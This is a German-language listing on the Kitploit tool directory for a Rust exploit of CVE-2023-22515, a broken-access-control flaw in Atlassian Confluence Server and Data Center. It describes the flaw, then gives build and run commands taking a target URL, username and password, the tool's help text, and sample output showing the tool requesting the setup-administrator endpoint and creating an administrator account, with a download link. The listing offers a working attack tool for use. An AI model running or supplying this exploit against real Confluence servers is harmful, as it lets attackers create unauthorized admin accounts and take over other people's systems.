Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/killvxk/cve-2023-22515-joaoviictorti
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubkillvxk/cve-2023-22515-joaoviictorti

CVE-2023-22515-joaoviictorti

Rust-basierter Exploit für CVE-2023-22515, der über eine fehlerhafte Zugriffskontrolle nicht autorisierte Administrator-Konten in Confluence Server und Data Center erstellt.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-22515

  • Überblick
  • Kompilieren
  • Verwendung
  • CVE-2023-22515 ausführen

Überblick

Confluence ist ein webbasiertes Enterprise-Wiki, das vom australischen Softwareunternehmen Atlassian entwickelt wurde. Atlassian wurde auf ein Problem aufmerksam gemacht, das von einigen Kunden gemeldet wurde: Externe Angreifer könnten eine bisher unbekannte Schwachstelle in öffentlich zugänglichen Confluence-Server- und Data-Center-Instanzen ausgenutzt haben, um nicht autorisierte Confluence-Administratorkonten zu erstellen und auf Confluence-Instanzen zuzugreifen.

Die Schwachstelle wurde als CVE-2023-22515 eingestuft.

Kompilieren

Führen Sie zunächst die Kompilierung mit dem folgenden Befehl durch:

root@kitploit:~
cargo build --release

Verwendung

Sie können dies auf zwei Arten tun:

root@kitploit:~
cargo run -- --target http://localhost --username "teste" --password "teste" 
root@kitploit:~
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 

Dies zeigt die Hilfe für das Tool an. Hier sind alle Schalter, die es unterstützt:

root@kitploit:~
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help

CVE-2023-22515 ausführen

root@kitploit:~
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
Tool herunterladen